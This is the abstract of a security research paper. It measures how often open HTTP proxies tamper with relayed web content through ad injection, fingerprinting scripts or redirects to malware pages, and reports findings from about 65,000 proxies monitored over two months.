Abstract |
Open HTTP proxies offer a fast and convenient solution for routing web traffic towards
a destination. In contrast to more elaborate relaying systems, such as anonymity
networks or VPN services, users can freely connect to an open HTTP proxy without the
need to install any special software. Therefore, open HTTP proxies are an attractive option
for bypassing IP-based filters and geo-location restrictions, circumventing content
blocking and censorship, and in general, hiding the client’s IP address when accessing a
web server. Nevertheless, the consequences of routing traffic through an untrusted third
party can be severe, while the operating incentives of the thousands of publicly available
HTTP proxies are questionable.
In this work, we present the results of a large-scale analysis of open HTTP proxies, focusing
on determining the extent to which user traffic is manipulated while being relayed.
We have designed and implemented a methodology for detecting proxies that, instead of
passively relaying traffic, actively modify the relayed content. Beyond simple detection,
the framework is capable of macroscopically attributing certain traffic modifications at the
network level to well-defined malicious actions, such as ad injection, user fingerprinting,
and redirection to malware landing pages, to name a few.
We have applied our methodology on a set of nearly 65,000 open HTTP proxies,
which we monitored for a period of two months. Our findings are alarming. A significant
fraction (5.15%) of the proxies we tested were found to perform some form of content
injection in the retrieved HTML page, which can be considered as malicious or unwanted.
Specifically, in 47% of the cases the injected code injected advertisements, 39% collected
user information that can be used for fingerprinting and tracking and 12% attempted to
redirect the user to pages that contained malware.
Our study reveals the true incentives of many of the publicly available web proxies.
Our findings raise several concerns, as we demonstrate multiple cases where the user can
be severely affected by connecting to an open proxy. In addition, we have generated a list
of currently pinpointed malicious servers that should be strongly avoided and black-listed.
Last but not least, our framework can stand as an open monitor for detecting additional
malicious proxies in the future.
|